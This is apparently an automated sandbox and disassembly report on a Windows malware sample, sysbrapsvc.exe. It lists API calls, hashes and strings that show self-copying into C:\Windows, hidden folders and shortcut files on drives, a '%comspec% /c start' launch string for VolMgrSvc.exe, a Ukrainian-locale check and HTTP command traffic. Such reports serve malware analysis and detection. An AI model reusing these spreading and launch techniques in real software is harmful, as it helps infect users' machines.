• Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
Yara matches
Similarity
• API ID: DriveTypelstrcpy
• String ID:
• API String ID: 3664088370-0
• Opcode ID: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
• Instruction ID: a3f39d1a22dcf836f44b0fbcddd46cfc88cbb50e51ff9e9dfde0dd7881e74902
• Opcode Fuzzy Hash: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
• Instruction Fuzzy Hash: DCF04975D00208EBCB00EFA4D44579EB7B4EF04304F00C0ADE815AB240E639AB58CB49
                                                                                APIs
                                                                                • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                                                                • wsprintfW.USER32 ref: 0040668F
                                                                                • wsprintfW.USER32 ref: 004066AF
                                                                                • wsprintfW.USER32 ref: 004066CF
                                                                                • wsprintfW.USER32 ref: 004066EF
                                                                                • wsprintfW.USER32 ref: 00406708
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                                                                • DeleteFileW.KERNEL32(?), ref: 00406792
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                                                                • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                                                                • CopyFileW.KERNEL32(C:\Windows\sysbrapsvc.exe,?,00000000), ref: 004067EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                                                                • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolMgrSvc.exe$%s\*$C:\Windows\sysbrapsvc.exe$shell32.dll$shell32.dll
                                                                                • API String ID: 2120662298-2075929577
                                                                                • Opcode ID: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction ID: c612be32194b3f0687db5988b06318d9a83eb4d95ba537684b9fbd0309d38362
                                                                                • Opcode Fuzzy Hash: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction Fuzzy Hash: 33D164B5900258ABCB20DF50DC54FEA77B8BB48304F00C5EAF20AA6191D7B99BD4CF59
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                                                                • wsprintfW.USER32 ref: 00406535
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                                • lstrcmpW.KERNEL32(?,00410FC4), ref: 00406571
                                                                                • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406587
                                                                                • wsprintfW.USER32 ref: 004065AA
                                                                                • wsprintfW.USER32 ref: 004065CA
                                                                                • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                                • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                                • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                • API String ID: 92872011-445461498
                                                                                • Opcode ID: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction ID: 53594aa6cee022007eb09e89ff8d3070c1334f86b1d3d86e8b3ef453570f0988
                                                                                • Opcode Fuzzy Hash: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction Fuzzy Hash: B2315BB5500218AFCB10DB60DC85FDA7778AB48701F40C5A5F609A3185DBB5DAD9CF58
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040D1B2
                                                                                • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D1D8
                                                                                • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D20F
                                                                                • GetTickCount.KERNEL32 ref: 0040D224
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D244
                                                                                • GetTickCount.KERNEL32 ref: 0040D24A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Sleepioctlsocketrecv
                                                                                • String ID:
                                                                                • API String ID: 107502007-0
                                                                                • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction ID: d1d91ce4da814b9a63f0d024f91aac80a52589da6ae3f0e8ee31fa34877a49b5
                                                                                • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction Fuzzy Hash: 5A31CA74D00209EFCF04DFA4DA48AEE77B1FF44315F1086A9E825A7290D7749A94CB59
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040EBF3
                                                                                • strcmp.NTDLL ref: 0040EC02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocalestrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3191669094-64918367
                                                                                • Opcode ID: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction ID: 39a3b49c0f9cc0ba3e3bafda0df6f1f41861fe80aa697247161161d98fc04bc2
                                                                                • Opcode Fuzzy Hash: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction Fuzzy Hash: 9AE0CD3594830876DA1065A15C02BA6371C5711701F0000B5AF14A21C1E5765119926B
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040192C
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                • GetTickCount.KERNEL32 ref: 004019F6
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                • GetTickCount.KERNEL32 ref: 00401A43
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 3345448188-3762367603
                                                                                • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction ID: 2c6eba30162642fa916e9f7e0fa03190df933f3dd928bdc23040f585d31ac0f6
                                                                                • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                                • Instruction Fuzzy Hash: 9E41F671600300ABCB209F74DC8CB9B77A9AF44720F14463DF995A72E1DB78E881CB99
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E9C8
                                                                                • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EA18
                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EA2B
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EA64
                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EA9A
                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EAC5
                                                                                • HttpSendRequestA.WININET(00000000,00411FA0,000000FF,00009E34), ref: 0040EAEF
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EB2E
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040EB80
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBB1
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBBE
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EBCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                • API String ID: 2761394606-2217117414
                                                                                • Opcode ID: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction ID: 65d8e98dfcdbd5221f12c344ddab433f9c0af5994e8cd23f0dde2b718a24ef5d
                                                                                • Opcode Fuzzy Hash: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction Fuzzy Hash: 91512EB5901228ABDB26CF54CC54FE9B3BCAB48705F1485E9B60DA6280D7B86FC4CF54
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 2403999931-3762367603
                                                                                • Opcode ID: c24e2c281c1906b642cdb759e74aa8db22e1369ec12f41aa5922d382b373e513
                                                                                • Instruction ID: 4aeae16d9e67a94d8ff1aa5cc2109be900ec35187bf01e7539301e61904878f7
                                                                                • Opcode Fuzzy Hash: c24e2c281c1906b642cdb759e74aa8db22e1369ec12f41aa5922d382b373e513
                                                                                • Instruction Fuzzy Hash: FA319475900705ABC7209F70EC48B97B7A8BF08300F048A3AF559A3691C77AF894CB98
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E098
                                                                                • InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040E22A
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E274
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E281
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                • String ID: <$GET
                                                                                • API String ID: 1205665004-427699995
                                                                                • Opcode ID: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction ID: 8a187a806069c9ef74607f7bf39df95f2c1829c28a5b92bcc4b0b83bf30a7a56
                                                                                • Opcode Fuzzy Hash: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction Fuzzy Hash: 16512DB1941228ABDB36CB50CC55BE9B3BCAB48705F1444E9F60DAA2C0D7B96BC4CF54
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,00000000,0040BDA2,006A0266,?,0040BDBE,00000000,0040D09C,?), ref: 0040600F
                                                                                • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                                • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                                                                • LeaveCriticalSection.KERNEL32(0041A400,?,?,?,?,?,?,0040BDBE,00000000,0040D09C,?), ref: 00406248
                                                                                Strings
                                                                                • C:\Users\user\tbtcmds.dat, xrefs: 004061C0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                • String ID: C:\Users\user\tbtcmds.dat
                                                                                • API String ID: 1457358591-3965455335
                                                                                • Opcode ID: efe6472d381cb2bf389d5362b33cf11889a757296c607a9731db49fac703d1ba
                                                                                • Instruction ID: 2241f90cca7a27a2546e95c76b2552fd8efe4d50fa40d22b7b041634b3385480
                                                                                • Opcode Fuzzy Hash: efe6472d381cb2bf389d5362b33cf11889a757296c607a9731db49fac703d1ba
                                                                                • Instruction Fuzzy Hash: 4271CFB4E002099BCB04CF94D985FEFB7B1AB48304F14857DE505BB382D779A951CBA6
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                • setsockopt.WS2_32 ref: 00401F2C
                                                                                • closesocket.WS2_32(?), ref: 00401F39
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 671207744-0
                                                                                • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction ID: 68686fb6eff55c499ad5be399ae1fa7ea08460e57826cc3027d59358e60976cc
                                                                                • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction Fuzzy Hash: 34519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction ID: 7a529818069a58d4d2ae4584624926d6a8b7ee91a4ee1179ae14f9cec19009dd
                                                                                • Opcode Fuzzy Hash: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction Fuzzy Hash: FC412AB5A0020ADFCB04DF99C884BAFB7B9FF48304F108569E515A7390D778AE85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction ID: 0dd75c4ae2219cb0414d4c222623d171442623ab9389109279868d9d6e555a3a
                                                                                • Opcode Fuzzy Hash: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction Fuzzy Hash: FA413C74A0020ADFCB04CF99D884BAFB7B5BF58304F508969E505A7390D779EA91CF94
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: af92e2ebcd257162aa272662d4163ff3babde7a1427c0522630bd4b0e64c68b4
                                                                                • Instruction ID: 37460acbf0a505b6a9388cec97320328f7083b01a8d1f88c89259c7d7d106706
                                                                                • Opcode Fuzzy Hash: af92e2ebcd257162aa272662d4163ff3babde7a1427c0522630bd4b0e64c68b4
                                                                                • Instruction Fuzzy Hash: A031E172200315ABC710AFB5ED8CAD7B7A8FF44324F04463EF58AD3280DB79A4449B99
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                                • CoCreateInstance.OLE32(00412920,00000000,00000001,00412900,?), ref: 00406423
                                                                                • wsprintfW.USER32 ref: 00406456
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstancewsprintf
                                                                                • String ID: %comspec%$/c start %s & start %s\VolMgrSvc.exe$Gh@
                                                                                • API String ID: 2038452267-1176807594
